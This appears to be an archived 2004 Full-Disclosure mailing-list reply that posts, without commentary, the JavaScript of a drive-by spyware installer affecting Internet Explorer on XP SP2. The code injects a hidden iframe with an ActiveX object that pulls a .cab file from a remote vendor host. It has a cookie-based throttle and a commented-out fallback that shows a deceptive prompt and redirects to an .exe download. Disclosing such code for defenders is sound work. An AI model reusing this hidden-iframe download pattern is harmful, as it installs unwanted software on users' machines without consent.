Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box
From: Mark Shirley (mshirley_at_gmail.com)
Date: 10/04/04
- Previous message: Berend-Jan Wever: "[Full-Disclosure] Test your windows OS"
- In reply to: Matt Andreko: "Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box"
- Next in thread: Carr, Robert: "RE: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: full-disclosure@lists.netsys.com Date: Mon, 4 Oct 2004 11:21:49 -0400
var exepath='http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab';
var retry_enabled = true;
var retry_cnt=1;
executeScript(getCookie('minpopup80wu03rd'));
function executeScript(CookieExists) {
//Check if cookie exists, if it does we know the user has visited the
site within the last 24 hrs so don't load the script
if (CookieExists!=null) {
//If cookie does exists then exit
return null;
}
else {
//If cookie does not exist then we can assume the user has not been
to the site within the last 24 hrs
document.write('<iframe id="downloads_manager"
style="position:absolute;visibility:hidden;"></iframe>');
document_code = '<html><head>\n';
document_code += '<\/head><body>\n';
document_code += '<object
onerror="window.parent.retry();" id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab"
HEIGHT=0 WIDTH=0><PARAM NAME="AffiliateID"
VALUE="%2BA0%2CJ%7Dh%3AB6%5E%3B9gy%3E7ue%2D%7Dhx"></object>\n';
document_code += '<\/body><\/html>';
downloads_manager.document.write(document_code);
downloads_manager.document.close();
setCookie('minpopup80wu03rd','test',1);
}
}
function retry()
{
//if(retry_cnt>0)
//{
//setCookie('minpopup80wu03rd','test',0);
//alert("To install latest At-Games Games update, please click Yes");
//document_code = '<html><head>\n';
//document_code += '<\/head><body>\n';
//document_code += '<object id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab"
HEIGHT=0 WIDTH=0></object>\n';
//document_code += '<\/body><\/html>';
//downloads_manager.document.write(document_code);
//downloads_manager.document.close();
//setCookie('minpopup80wu03rd','test',1);
//retry_cnt--;
//} else {
//alert("This is a 1 time install, once you click Open it will
never pop up this message again");
//window.location =
"http://www.NetpalOffers.net/NetpalOffers/DMOXe/80wu03rd.exe";
//}
}
function getCookie(NameOfCookie) {
if (document.cookie.length > 0) {
begin = document.cookie.indexOf(NameOfCookie+"=");
if (begin != -1) {
begin += NameOfCookie.length+1;
end = document.cookie.indexOf(";", begin);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(begin, end)); }
}
return null;
}
function setCookie(NameOfCookie, value, expiredays) {
var ExpireDate = new Date ();
ExpireDate.setTime(ExpireDate.getTime() + (expiredays * 24 * 3600 * 1000));
document.cookie = NameOfCookie + "=" + escape(value) +
((expiredays == null) ? "" : "; expires=" + ExpireDate.toGMTString());
}
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Previous message: Berend-Jan Wever: "[Full-Disclosure] Test your windows OS"
- In reply to: Matt Andreko: "Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box"
- Next in thread: Carr, Robert: "RE: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
